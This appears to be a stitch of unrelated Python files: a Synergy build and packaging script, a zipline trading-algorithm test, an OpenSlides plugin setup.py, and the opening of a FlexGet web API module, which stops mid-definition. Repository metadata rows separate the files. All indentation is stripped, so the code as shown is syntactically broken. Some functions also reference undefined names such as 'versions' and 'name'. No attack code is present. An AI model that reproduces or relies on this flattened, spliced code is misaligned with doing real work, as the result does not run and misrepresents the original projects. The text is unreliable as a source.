binDir = self.getGenerator().binDir
resDir = self.cmake_dir
package = '%s-%s-%s' % (
self.project,
self.getVersionForFilename(),
self.getLinuxPlatform())
debDir = '%s/deb' % buildDir
if os.path.exists(debDir):
shutil.rmtree(debDir)
metaDir = '%s/%s/DEBIAN' % (debDir, package)
os.makedirs(metaDir)
templateFile = open(resDir + '/deb/control.in')
template = templateFile.read()
template = template.replace('${in:version}',
self.getVersionNumber())
template = template.replace('${in:arch}',
self.getDebianArch())
controlPath = '%s/control' % metaDir
controlFile = open(controlPath, 'w')
controlFile.write(template)
controlFile.close()
targetBin = '%s/%s/usr/bin' % (debDir, package)
targetPlugin = '%s/%s/usr/lib/synergy/plugins' % (debDir, package)
targetShare = '%s/%s/usr/share' % (debDir, package)
targetApplications = "%s/applications" % targetShare
targetIcons = "%s/icons" % targetShare
targetDocs = "%s/doc/%s" % (targetShare, self.project)
os.makedirs(targetBin)
os.makedirs(targetPlugin)
os.makedirs(targetApplications)
os.makedirs(targetIcons)
os.makedirs(targetDocs)
for root, dirs, files in os.walk(debDir):
for d in dirs:
os.chmod(os.path.join(root, d), 0o0755)
binFiles = ['synergy', 'synergyc', 'synergys', 'synergyd', 'syntool']
for f in binFiles:
shutil.copy("%s/%s" % (binDir, f), targetBin)
target = "%s/%s" % (targetBin, f)
os.chmod(target, 0o0755)
err = os.system("strip " + target)
if err != 0:
raise Exception('strip failed: ' + str(err))
pluginDir = "%s/plugins" % binDir
pluginFiles = [ 'libns.so']
for f in pluginFiles:
shutil.copy("%s/%s" % (pluginDir, f), targetPlugin)
target = "%s/%s" % (targetPlugin, f)
os.chmod(target, 0o0644)
err = os.system("strip " + target)
if err != 0:
raise Exception('strip failed: ' + str(err))
shutil.copy("%s/synergy.desktop" % resDir, targetApplications)
shutil.copy("%s/synergy.ico" % resDir, targetIcons)
docTarget = "%s/doc/%s" % (targetShare, self.project)
copyrightPath = "%s/deb/copyright" % resDir
shutil.copy(copyrightPath, docTarget)
shutil.copy("%s/deb/changelog" % resDir, docTarget)
os.system("gzip -9 %s/changelog" % docTarget)
if err != 0:
raise Exception('gzip failed: ' + str(err))
for root, dirs, files in os.walk(targetShare):
for f in files:
os.chmod(os.path.join(root, f), 0o0644)
target = '../../bin/%s.deb' % package
try:
self.try_chdir(debDir)
# TODO: consider dpkg-buildpackage (higher level tool)
cmd = 'fakeroot dpkg-deb --build %s' % package
print "Command: " + cmd
err = os.system(cmd)
if err != 0:
raise Exception('dpkg-deb failed: ' + str(err))
cmd = 'lintian %s.deb' % package
print "Command: " + cmd
err = os.system(cmd)
if err != 0:
raise Exception('lintian failed: ' + str(err))
self.unixMove('*.deb', target)
finally:
self.restore_chdir()
def distSrc(self):
name = '%s-%s-%s' % (
self.project,
self.getVersionForFilename(),
'Source')
exportPath = self.getGenerator().buildDir + '/' + name
if os.path.exists(exportPath):
print "Removing existing export..."
shutil.rmtree(exportPath)
os.mkdir(exportPath)
cmd = "git archive %s | tar -x -C %s" % (
self.getGitBranchName(), exportPath)
print 'Exporting repository to: ' + exportPath
err = os.system(cmd)
if err != 0:
raise Exception('Repository export failed: ' + str(err))
packagePath = '../' + self.getGenerator().binDir + '/' + name + '.tar.gz'
try:
self.try_chdir(self.getGenerator().buildDir)
print 'Packaging to: ' + packagePath
err = os.system('tar cfvz ' + packagePath + ' ' + name)
if err != 0:
raise Exception('Package failed: ' + str(err))
finally:
self.restore_chdir()
def unixMove(self, source, dest):
print 'Moving ' + source + ' to ' + dest
err = os.system('mv ' + source + ' ' + dest)
if err != 0:
raise Exception('Package failed: ' + str(err))
def distMac(self):
self.loadConfig()
binDir = self.getGenerator().getBinDir('Release')
name = "Synergy"
dist = binDir + "/" + name
# ensure dist dir is clean
if os.path.exists(dist):
shutil.rmtree(dist)
os.makedirs(dist)
shutil.move(binDir + "/" + name + ".app", dist + "/" + name + ".app")
self.try_chdir(dist)
err = os.system("ln -s /Applications")
self.restore_chdir()
fileName = "%s-%s-%s.dmg" % (
self.project,
self.getVersionForFilename(),
self.getMacPackageName())
cmd = "hdiutil create " + fileName + " -srcfolder ./" + name + "/ -ov"
self.try_chdir(binDir)
err = os.system(cmd)
self.restore_chdir()
def distWix(self):
generator = self.getGeneratorFromConfig().cmakeName
arch = 'x86'
if generator.endswith('Win64'):
arch = 'x64'
version = self.getVersionNumber()
args = "/p:DefineConstants=\"Version=%s\"" % version
self.run_vcbuild(
generator, 'release', 'synergy.sln', args,
'src/setup/win32/', 'x86')
filename = "%s-%s-Windows-%s.msi" % (
self.project,
self.getVersionForFilename(),
arch)
old = "bin/Release/synergy.msi"
new = "bin/Release/%s" % (filename)
try:
os.remove(new)
except OSError:
pass
os.rename(old, new)
def distNsis(self, vcRedistDir, qtDir):
if vcRedistDir == '':
raise Exception(
'VC++ redist dir path not specified (--vcredist-dir).')
if qtDir == '':
raise Exception(
'QT SDK dir path not specified (--qt-dir).')
generator = self.getGeneratorFromConfig().cmakeName
arch = 'x86'
installDirVar = '$PROGRAMFILES32'
if generator.endswith('Win64'):
arch = 'x64'
installDirVar = '$PROGRAMFILES64'
templateFile = open(self.cmake_dir + '\Installer.nsi.in')
template = templateFile.read()
template = template.replace('${in:version}', self.getVersionNumber())
template = template.replace('${in:arch}', arch)
template = template.replace('${in:vcRedistDir}', vcRedistDir)
template = template.replace('${in:qtDir}', qtDir)
template = template.replace('${in:installDirVar}', installDirVar)
nsiPath = self.getGenerator().buildDir + '\Installer.nsi'
nsiFile = open(nsiPath, 'w')
nsiFile.write(template)
nsiFile.close()
command = 'makensis ' + nsiPath
print 'NSIS command: ' + command
err = os.system(command)
if err != 0:
raise Exception('Package failed: ' + str(err))
def getVersionNumber(self):
cmakeFile = open('CMakeLists.txt')
cmake = cmakeFile.read()
majorRe = re.search('VERSION_MAJOR (\d+)', cmake)
major = majorRe.group(1)
minorRe = re.search('VERSION_MINOR (\d+)', cmake)
minor = minorRe.group(1)
revRe = re.search('VERSION_REV (\d+)', cmake)
rev = revRe.group(1)
return "%s.%s.%s" % (major, minor, rev)
def getVersionStage(self):
cmakeFile = open('CMakeLists.txt')
cmake = cmakeFile.read()
stageRe = re.search('VERSION_STAGE (\w+)', cmake)
return stageRe.group(1)
def getVersionForFilename(self):
versionStage = self.getVersionStage()
gitBranch = self.getGitBranchName()
gitRevision = self.getGitRevision()
return "%s-%s-%s" % (gitBranch, versionStage, gitRevision)
def distftp(self, type, ftp):
if not type:
raise Exception('Platform type not specified.')
self.loadConfig()
binDir = self.getGenerator().getBinDir('Release')
filename = self.getDistFilename(type)
packageSource = binDir + '/' + filename
packageTarget = filename
ftp.upload(packageSource, packageTarget)
if type != 'src':
pluginsDir = binDir + '/plugins'
nsPluginSource = self.findLibraryFile(type, pluginsDir, 'ns')
if nsPluginSource:
nsPluginTarget = self.getLibraryDistFilename(type, pluginsDir, 'ns')
ftp.upload(nsPluginSource, nsPluginTarget, "plugins")
def getLibraryDistFilename(self, type, dir, name):
(platform, packageExt, libraryExt) = self.getDistributePlatformInfo(type)
firstPart = '%s-%s-%s' % (name, self.getVersionForFilename(), platform)
filename = '%s.%s' % (firstPart, libraryExt)
if type == 'rpm' or type == 'deb':
# linux is a bit special, include dist type (deb/rpm in filename)
filename = '%s-%s.%s' % (firstPart, packageExt, libraryExt)
return filename
def findLibraryFile(self, type, dir, name):
if not os.path.exists(dir):
return None
(platform, packageExt, libraryExt) = self.getDistributePlatformInfo(type)
ext = libraryExt
pattern = name + '\.' + ext
for filename in os.listdir(dir):
if re.search(pattern, filename):
return dir + '/' + filename
return None
def getDistributePlatformInfo(self, type):
ext = None
libraryExt = None
platform = None
if type == 'src':
ext = 'tar.gz'
platform = 'Source'
elif type == 'rpm' or type == 'deb':
ext = type
libraryExt = 'so'
platform = self.getLinuxPlatform()
elif type == 'win':
# get platform based on last generator used
ext = 'msi'
libraryExt = 'dll'
generator = self.getGeneratorFromConfig().cmakeName
if generator.find('Win64') != -1:
platform = 'Windows-x64'
else:
platform = 'Windows-x86'
elif type == 'mac':
ext = "dmg"
libraryExt = 'dylib'
platform = self.getMacPackageName()
if not platform:
raise Exception('Unable to detect distributable platform.')
return (platform, ext, libraryExt)
def getDistFilename(self, type):
pattern = self.getVersionForFilename()
for filename in os.listdir(self.getBinDir('Release')):
if re.search(pattern, filename):
return filename
raise Exception('Could not find package name with pattern: ' + pattern)
def getDebianArch(self):
if os.uname()[4][:3] == 'arm':
return 'armhf'
# os_bits should be loaded with '32bit' or '64bit'
import platform
(os_bits, other) = platform.architecture()
# get platform based on current platform
if os_bits == '32bit':
return 'i386'
elif os_bits == '64bit':
return 'amd64'
else:
raise Exception("unknown os bits: " + os_bits)
def getLinuxPlatform(self):
if os.uname()[4][:3] == 'arm':
return 'Linux-armv6l'
# os_bits should be loaded with '32bit' or '64bit'
import platform
(os_bits, other) = platform.architecture()
# get platform based on current platform
if os_bits == '32bit':
return 'Linux-i686'
elif os_bits == '64bit':
return 'Linux-x86_64'
else:
raise Exception("unknown os bits: " + os_bits)
def dist_usage(self):
print ('Usage: %s package [package-type]\n'
'\n'
'Replace [package-type] with one of:\n'
' src .tar.gz source (Posix only)\n'
' rpm .rpm package (Red Hat)\n'
' deb .deb paclage (Debian)\n'
' win .exe installer (Windows)\n'
' mac .dmg package (Mac OS X)\n'
'\n'
'Example: %s package src-tgz') % (self.this_cmd, self.this_cmd)
def about(self):
print ('Help Me script, from the Synergy project.\n'
'%s\n'
'\n'
'For help, run: %s help') % (self.website_url, self.this_cmd)
def try_chdir(self, dir):
global prevdir
if dir == '':
prevdir = ''
return
# Ensure temp build dir exists.
if not os.path.exists(dir):
print 'Creating dir: ' + dir
os.makedirs(dir)
prevdir = os.path.abspath(os.curdir)
# It will exist by this point, so it's safe to chdir.
print 'Entering dir: ' + dir
os.chdir(dir)
def restore_chdir(self):
global prevdir
if prevdir == '':
return
print 'Going back to: ' + prevdir
os.chdir(prevdir)
def open_internal(self, project_filename, application = ''):
if not os.path.exists(project_filename):
raise Exception('Project file (%s) not found, run hm conf first.' % project_filename)
else:
path = project_filename
if application != '':
path = application + ' ' + path
err = os.system(path)
if err != 0:
raise Exception('Could not open project with error code code: ' + str(err))
def setup(self, target=''):
print "Running setup..."
oldGenerator = self.findGeneratorFromConfig()
if not oldGenerator == None:
for target in ['debug', 'release']:
buildDir = oldGenerator.getBuildDir(target)
cmakeCacheFilename = 'CMakeCache.txt'
if buildDir != '':
cmakeCacheFilename = buildDir + '/' + cmakeCacheFilename
if os.path.exists(cmakeCacheFilename):
print "Removing %s, since generator changed." % cmakeCacheFilename
os.remove(cmakeCacheFilename)
# always either get generator from args, or prompt user when
# running setup
generator = self.get_generator_from_prompt()
config = self.getConfig()
config.set('hm', 'setup_version', self.setup_version)
# store the generator so we don't need to ask again
config.set('cmake', 'generator', generator)
self.write_config(config)
# for all targets, set conf not run
self.setConfRun('all', False)
self.setConfRun('debug', False)
self.setConfRun('release', False)
print "Setup complete."
def getConfig(self):
if os.path.exists(self.configFilename):
config = ConfigParser.ConfigParser()
config.read(self.configFilename)
else:
config = ConfigParser.ConfigParser()
if not config.has_section('hm'):
config.add_section('hm')
if not config.has_section('cmake'):
config.add_section('cmake')
return config
def write_config(self, config, target=''):
if not os.path.isdir(self.configDir):
os.mkdir(self.configDir)
configfile = open(self.configFilename, 'wb')
config.write(configfile)
def getGeneratorFromConfig(self):
generator = self.findGeneratorFromConfig()
if generator:
return generator
raise Exception("Could not find generator: " + name)
def findGeneratorFromConfig(self):
config = ConfigParser.RawConfigParser()
config.read(self.configFilename)
if not config.has_section('cmake'):
return None
name = config.get('cmake', 'generator')
generators = self.get_generators()
keys = generators.keys()
keys.sort()
for k in keys:
if generators[k].cmakeName == name:
return generators[k]
return None
def min_setup_version(self, version):
if os.path.exists(self.configFilename):
config = ConfigParser.RawConfigParser()
config.read(self.configFilename)
try:
return config.getint('hm', 'setup_version') >= version
except:
return False
else:
return False
def hasConfRun(self, target):
if self.min_setup_version(2):
config = ConfigParser.RawConfigParser()
config.read(self.configFilename)
try:
return config.getboolean('hm', 'conf_done_' + target)
except:
return False
else:
return False
def setConfRun(self, target, hasRun=True):
if self.min_setup_version(3):
config = ConfigParser.RawConfigParser()
config.read(self.configFilename)
config.set('hm', 'conf_done_' + target, hasRun)
self.write_config(config)
else:
raise Exception("User does not have correct setup version.")
def get_generators(self):
if sys.platform == 'win32':
return self.win32_generators
elif sys.platform in ['linux2', 'sunos5', 'freebsd7', 'aix5']:
return self.unix_generators
elif sys.platform == 'darwin':
return self.darwin_generators
else:
raise Exception('Unsupported platform: ' + sys.platform)
def get_generator_from_prompt(self):
return self.getGenerator().cmakeName
def getGenerator(self):
generators = self.get_generators()
if len(generators.keys()) == 1:
return generators[generators.keys()[0]]
# if user has specified a generator as an argument
if self.generator_id:
return generators[int(self.generator_id)]
conf = self.findGeneratorFromConfig()
if conf:
return conf
raise Exception(
'Generator not specified, use -g arg ' +
'(use `hm genlist` for a list of generators).')
def setup_generator_prompt(self, generators):
if self.no_prompts:
raise Exception('User prompting is disabled.')
prompt = 'Enter a number:'
print prompt,
generator_id = raw_input()
if generator_id in generators:
print 'Selected generator:', generators[generator_id]
else:
print 'Invalid number, try again.'
self.setup_generator_prompt(generators)
return generators[generator_id]
def get_vcvarsall(self, generator):
import platform, _winreg
# os_bits should be loaded with '32bit' or '64bit'
(os_bits, other) = platform.architecture()
# visual studio is a 32-bit app, so when we're on 64-bit, we need to check the WoW dungeon
if os_bits == '64bit':
key_name = r'SOFTWARE\Wow6432Node\Microsoft\VisualStudio\SxS\VS7'
else:
key_name = r'SOFTWARE\Microsoft\VisualStudio\SxS\VC7'
try:
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, key_name)
except:
raise Exception('Unable to open Visual Studio registry key. Application may not be installed.')
if generator.startswith('Visual Studio 8'):
value,type = _winreg.QueryValueEx(key, '8.0')
elif generator.startswith('Visual Studio 9'):
value,type = _winreg.QueryValueEx(key, '9.0')
elif generator.startswith('Visual Studio 10'):
value,type = _winreg.QueryValueEx(key, '10.0')
else:
raise Exception('Cannot determine vcvarsall.bat location for: ' + generator)
# not sure why, but the value on 64-bit differs slightly to the original
if os_bits == '64bit':
path = value + r'vc\vcvarsall.bat'
else:
path = value + r'vcvarsall.bat'
if not os.path.exists(path):
raise Exception("'%s' not found." % path)
return path
def run_vcbuild(self, generator, mode, solution, args='', dir='', config32='Win32'):
import platform
# os_bits should be loaded with '32bit' or '64bit'
(os_bits, other) = platform.architecture()
# Now we choose the parameters bases on OS 32/64 and our target 32/64
# http://msdn.microsoft.com/en-us/library/x4d2c09s%28VS.80%29.aspx
# valid options are only: ia64 amd64 x86_amd64 x86_ia64
# but calling vcvarsall.bat does not garantee that it will work
# ret code from vcvarsall.bat is always 0 so the only way of knowing that I worked is by analysing the text output
# ms bugg: install VS9, FeaturePack, VS9SP1 and you'll obtain a vcvarsall.bat that fails.
if generator.find('Win64') != -1:
# target = 64bit
if os_bits == '32bit':
vcvars_platform = 'x86_amd64' # 32bit OS building 64bit app
else:
vcvars_platform = 'amd64' # 64bit OS building 64bit app
config_platform = 'x64'
else: # target = 32bit
vcvars_platform = 'x86' # 32/64bit OS building 32bit app
config_platform = config32
if mode == 'release':
config = 'Release'
else:
config = 'Debug'
if generator.startswith('Visual Studio 10'):
cmd = ('@echo off\n'
'call "%s" %s \n'
'cd "%s"\n'
'msbuild /nologo %s /p:Configuration="%s" /p:Platform="%s" "%s"'
) % (self.get_vcvarsall(generator), vcvars_platform, dir, args, config, config_platform, solution)
else:
config = config + '|' + config_platform
cmd = ('@echo off\n'
'call "%s" %s \n'
'cd "%s"\n'
'vcbuild /nologo %s "%s" "%s"'
) % (self.get_vcvarsall(generator), vcvars_platform, dir, args, solution, config)
# Generate a batch file, since we can't use environment variables directly.
temp_bat = self.getBuildDir() + r'\vcbuild.bat'
file = open(temp_bat, 'w')
file.write(cmd)
file.close()
err = os.system(temp_bat)
if err != 0:
raise Exception('Microsoft compiler failed with error code: ' + str(err))
def ensure_setup_latest(self):
if not self.min_setup_version(self.setup_version):
self.setup()
def reformat(self):
err = os.system(
r'tool\astyle\AStyle.exe '
'--quiet --suffix=none --style=java --indent=force-tab=4 --recursive '
'lib/*.cpp lib/*.h cmd/*.cpp cmd/*.h')
if err != 0:
raise Exception('Reformat failed with error code: ' + str(err))
def printGeneratorList(self):
generators = self.get_generators()
keys = generators.keys()
keys.sort()
for k in keys:
print str(k) + ': ' + generators[k].cmakeName
def getMacVersion(self):
if not self.macSdk:
raise Exception("Mac OS X SDK not set.")
result = re.search('(\d+)\.(\d+)', self.macSdk)
if not result:
print versions
raise Exception("Could not find Mac OS X version.")
major = int(result.group(1))
minor = int(result.group(2))
return (major, minor)
def getMacPackageName(self):
(major, minor) = self.getMacVersion()
if major == 10:
if minor <= 4:
# 10.4: intel and power pc
arch = "Universal"
elif minor <= 6:
# 10.5: 32-bit intel
arch = "i386"
else:
# 10.7: 64-bit intel (gui only)
arch = "x86_64"
else:
raise Exception("Mac OS major version unknown: " +
str(major))
# version is major and minor with no dots (e.g. 106)
version = str(major) + str(minor)
return "MacOSX%s-%s" % (version, arch)
def reset(self):
if os.path.exists('build'):
shutil.rmtree('build')
if os.path.exists('bin'):
shutil.rmtree('bin')
if os.path.exists('lib'):
shutil.rmtree('lib')
if os.path.exists('src/gui/tmp'):
shutil.rmtree('src/gui/tmp')
# qt 4.3 generates ui_ files.
for filename in glob.glob("src/gui/ui_*"):
os.remove(filename)
# the command handler should be called only from hm.py (i.e. directly
# from the command prompt). the purpose of this class is so that we
# don't need to do argument handling all over the place in the internal
# commands class.
class CommandHandler:
ic = InternalCommands()
build_targets = []
vcRedistDir = ''
qtDir = ''
def __init__(self, argv, opts, args, verbose):
self.ic.verbose = verbose
self.opts = opts
self.args = args
for o, a in self.opts:
if o == '--no-prompts':
self.ic.no_prompts = True
elif o in ('-g', '--generator'):
self.ic.generator_id = a
elif o == '--skip-gui':
self.ic.enableMakeGui = False
elif o == '--skip-core':
self.ic.enableMakeCore = False
elif o in ('-d', '--debug'):
self.build_targets += ['debug',]
elif o in ('-r', '--release'):
self.build_targets += ['release',]
elif o == '--vcredist-dir':
self.vcRedistDir = a
elif o == '--qt-dir':
self.qtDir = a
elif o == '--mac-sdk':
self.ic.macSdk = a
elif o == '--mac-identity':
self.ic.macIdentity = a
def about(self):
self.ic.about()
def setup(self):
self.ic.setup()
def configure(self):
self.ic.configureAll(self.build_targets)
def build(self):
self.ic.build(self.build_targets)
def clean(self):
self.ic.clean(self.build_targets)
def update(self):
self.ic.update()
def install(self):
print 'Not yet implemented: install'
def doxygen(self):
self.ic.doxygen()
def dist(self):
type = None
if len(self.args) > 0:
type = self.args[0]
self.ic.dist(type, self.vcRedistDir, self.qtDir)
def distftp(self):
type = None
host = None
user = None
password = None
dir = None
if len(self.args) > 0:
type = self.args[0]
for o, a in self.opts:
if o == '--host':
host = a
elif o == '--user':
user = a
elif o == '--pass':
password = a
elif o == '--dir':
dir = a
if not host:
raise Exception('FTP host was not specified.')
ftp = ftputil.FtpUploader(
host, user, password, dir)
self.ic.distftp(type, ftp)
def destroy(self):
self.ic.destroy()
def kill(self):
self.ic.kill()
def usage(self):
self.ic.usage()
def revision(self):
self.ic.revision()
def reformat(self):
self.ic.reformat()
def open(self):
self.ic.open()
def genlist(self):
self.ic.printGeneratorList()
def reset(self):
self.ic.reset()
def signwin(self):
pfx = None
pwd = None
dist = False
for o, a in self.opts:
if o == '--pfx':
pfx = a
elif o == '--pwd':
pwd = a
elif o == '--dist':
dist = True
self.ic.signwin(pfx, pwd, dist)
def signmac(self):
self.ic.signmac()
| gpl-2.0 | 8,686,066,971,684,435,000 | 26.578688 | 116 | 0.64944 | false |
CarterBain/AlephNull | tests/test_events_through_risk.py | 3 | 11456 | #
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import datetime
import pytz
import numpy as np
from zipline.finance.trading import SimulationParameters
from zipline.finance import trading
from zipline.algorithm import TradingAlgorithm
from zipline.protocol import (
Event,
DATASOURCE_TYPE
)
class BuyAndHoldAlgorithm(TradingAlgorithm):
SID_TO_BUY_AND_HOLD = 1
def initialize(self):
self.holding = False
def handle_data(self, data):
if not self.holding:
self.order(self.SID_TO_BUY_AND_HOLD, 100)
self.holding = True
class TestEventsThroughRisk(unittest.TestCase):
def test_daily_buy_and_hold(self):
start_date = datetime.datetime(
year=2006,
month=1,
day=3,
hour=0,
minute=0,
tzinfo=pytz.utc)
end_date = datetime.datetime(
year=2006,
month=1,
day=5,
hour=0,
minute=0,
tzinfo=pytz.utc)
sim_params = SimulationParameters(
period_start=start_date,
period_end=end_date,
emission_rate='daily'
)
algo = BuyAndHoldAlgorithm(
sim_params=sim_params,
data_frequency='daily')
first_date = datetime.datetime(2006, 1, 3, tzinfo=pytz.utc)
second_date = datetime.datetime(2006, 1, 4, tzinfo=pytz.utc)
third_date = datetime.datetime(2006, 1, 5, tzinfo=pytz.utc)
trade_bar_data = [
Event({
'open_price': 10,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': first_date,
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 15,
'close_price': 20,
'price': 20,
'volume': 2000,
'sid': 1,
'dt': second_date,
'source_id': 'test_list',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 20,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': third_date,
'source_id': 'test_list',
'type': DATASOURCE_TYPE.TRADE
}),
]
benchmark_data = [
Event({
'returns': 0.1,
'dt': first_date,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
Event({
'returns': 0.2,
'dt': second_date,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
Event({
'returns': 0.4,
'dt': third_date,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
]
algo.benchmark_return_source = benchmark_data
algo.sources = list([trade_bar_data])
gen = algo._create_generator(sim_params)
# TODO: Hand derive these results.
# Currently, the output from the time of this writing to
# at least be an early warning against changes.
expected_algorithm_returns = {
first_date: 0.0,
second_date: -0.000350,
third_date: -0.050018
}
# TODO: Hand derive these results.
# Currently, the output from the time of this writing to
# at least be an early warning against changes.
expected_sharpe = {
first_date: np.nan,
second_date: -31.56903265,
third_date: -11.459888981,
}
for bar in gen:
current_dt = algo.datetime
crm = algo.perf_tracker.cumulative_risk_metrics
np.testing.assert_almost_equal(
crm.algorithm_returns[current_dt],
expected_algorithm_returns[current_dt],
decimal=6)
np.testing.assert_almost_equal(
crm.metrics.sharpe[current_dt],
expected_sharpe[current_dt],
decimal=6,
err_msg="Mismatch at %s" % (current_dt,))
def test_minute_buy_and_hold(self):
with trading.TradingEnvironment():
start_date = datetime.datetime(
year=2006,
month=1,
day=3,
hour=0,
minute=0,
tzinfo=pytz.utc)
end_date = datetime.datetime(
year=2006,
month=1,
day=5,
hour=0,
minute=0,
tzinfo=pytz.utc)
sim_params = SimulationParameters(
period_start=start_date,
period_end=end_date,
emission_rate='daily',
data_frequency='minute')
algo = BuyAndHoldAlgorithm(
sim_params=sim_params,
data_frequency='minute')
first_date = datetime.datetime(2006, 1, 3, tzinfo=pytz.utc)
first_open, first_close = \
trading.environment.get_open_and_close(first_date)
second_date = datetime.datetime(2006, 1, 4, tzinfo=pytz.utc)
second_open, second_close = \
trading.environment.get_open_and_close(second_date)
third_date = datetime.datetime(2006, 1, 5, tzinfo=pytz.utc)
third_open, third_close = \
trading.environment.get_open_and_close(third_date)
benchmark_data = [
Event({
'returns': 0.1,
'dt': first_close,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
Event({
'returns': 0.2,
'dt': second_close,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
Event({
'returns': 0.4,
'dt': third_close,
'source_id': 'test-benchmark-source',
'type': DATASOURCE_TYPE.BENCHMARK
}),
]
trade_bar_data = [
Event({
'open_price': 10,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': first_open,
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 10,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': first_open + datetime.timedelta(minutes=10),
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 15,
'close_price': 20,
'price': 20,
'volume': 2000,
'sid': 1,
'dt': second_open,
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 15,
'close_price': 20,
'price': 20,
'volume': 2000,
'sid': 1,
'dt': second_open + datetime.timedelta(minutes=10),
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 20,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': third_open,
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
Event({
'open_price': 20,
'close_price': 15,
'price': 15,
'volume': 1000,
'sid': 1,
'dt': third_open + datetime.timedelta(minutes=10),
'source_id': 'test-trade-source',
'type': DATASOURCE_TYPE.TRADE
}),
]
algo.benchmark_return_source = benchmark_data
algo.sources = list([trade_bar_data])
gen = algo._create_generator(sim_params)
crm = algo.perf_tracker.cumulative_risk_metrics
first_msg = gen.next()
self.assertIsNotNone(first_msg,
"There should be a message emitted.")
# Protects against bug where the positions appeared to be
# a day late, because benchmarks were triggering
# calculations before the events for the day were
# processed.
self.assertEqual(1, len(algo.portfolio.positions), "There should "
"be one position after the first day.")
self.assertEquals(
0,
crm.metrics.algorithm_volatility[algo.datetime.date()],
"On the first day algorithm volatility does not exist.")
second_msg = gen.next()
self.assertIsNotNone(second_msg, "There should be a message "
"emitted.")
self.assertEqual(1, len(algo.portfolio.positions),
"Number of positions should stay the same.")
# TODO: Hand derive. Current value is just a canary to
# detect changes.
np.testing.assert_almost_equal(
0.050022510129558301,
crm.algorithm_returns[-1],
decimal=6)
third_msg = gen.next()
self.assertEqual(1, len(algo.portfolio.positions),
"Number of positions should stay the same.")
self.assertIsNotNone(third_msg, "There should be a message "
"emitted.")
# TODO: Hand derive. Current value is just a canary to
# detect changes.
np.testing.assert_almost_equal(
-0.047639464532418657,
crm.algorithm_returns[-1],
decimal=6)
| apache-2.0 | 354,420,153,847,497,400 | 32.595308 | 78 | 0.464735 | false |
OpenSlides/openslides-votecollector | setup.py | 1 | 1308 | from setuptools import find_packages, setup
package_name = 'openslides-votecollector'
module_name = 'openslides_votecollector'
module = __import__(module_name)
with open('README.rst') as readme:
long_description = readme.read()
with open('requirements.txt') as requirements:
install_requires = requirements.readlines()
setup(
name=package_name,
author='Authors of %s, see AUTHORS' % module.__verbose_name__,
author_email='[email protected]',
description=module.__verbose_name__,
license=module.__license__,
long_description=long_description,
url=module.__url__,
version=module.__version__,
keywords='OpenSlides',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Plugins',
'Environment :: Web Environment',
'Framework :: Django',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
packages=find_packages(exclude=['tests']),
include_package_data=True,
install_requires=install_requires,
entry_points={'openslides_plugins': '%s = %s' % (module.__verbose_name__, module_name)})
| mit | 434,190,824,964,950,200 | 32.538462 | 92 | 0.651376 | false |
ibrahimkarahan/Flexget | flexget/ui/api.py | 5 | 7172 | from flask import request, jsonify, Blueprint, Response, flash
import flexget
from flexget.config_schema import resolve_ref, process_config, get_schema
from flexget.manager import manager
from flexget.options import get_parser
from flexget.plugin import plugin_schemas
from flexget.utils.tools import BufferQueue
API_VERSION = 1
api = Blueprint('api', __name__, url_prefix='/api')
# Serves the appropriate schema for any /api method. Schema for /api/x/y can be found at /schema/api/x/y
api_schema = Blueprint('api_schema', __name__, url_prefix='/schema/api')
@api.after_request
def attach_schema(response):
# TODO: Check if /schema/ourpath exists
schema_path = '/schema' + request.path
response.headers[b'Content-Type'] += '; profile=%s' % schema_path
return response
@api_schema.route('/version')
def version_schema():
return jsonify({
'type': 'object',
'properties': {
'flexget_version': {'type': 'string', 'description': 'FlexGet version string'},
'api_version': {'type': 'integer', 'description': 'Version of the json api'}
}
})
@api.route('/version')
def version():
return jsonify(flexget_version=flexget.__version__, api_version=API_VERSION)
exec_parser = get_parser('execute')
@api.route('/execute', methods=['GET', 'POST'])
def execute():
kwargs = request.json or {}
options_string = kwargs.pop('options_string', '')
if options_string:
try:
kwargs['options'] = exec_parser.parse_args(options_string, raise_errors=True).execute
except ValueError as e:
return jsonify(error='invalid options_string specified: %s' % e.message), 400
# We'll stream the log results as they arrive in the bufferqueue
kwargs['output'] = BufferQueue()
manager.execute(**kwargs)
return Response(kwargs['output'], mimetype='text/plain'), 200
task_schema = {
'type': 'object',
'properties': {
'name': {'type': 'string', 'description': 'The name of this task.'},
'config': plugin_schemas(context='task')
},
'required': ['name'],
'additionalProperties': False,
'links': [
{'rel': 'self', 'href': '/api/tasks/{name}/'},
{'rel': 'edit', 'method': 'PUT', 'href': '', 'schema': {'$ref': '#'}},
{'rel': 'delete', 'method': 'DELETE', 'href': ''}
]
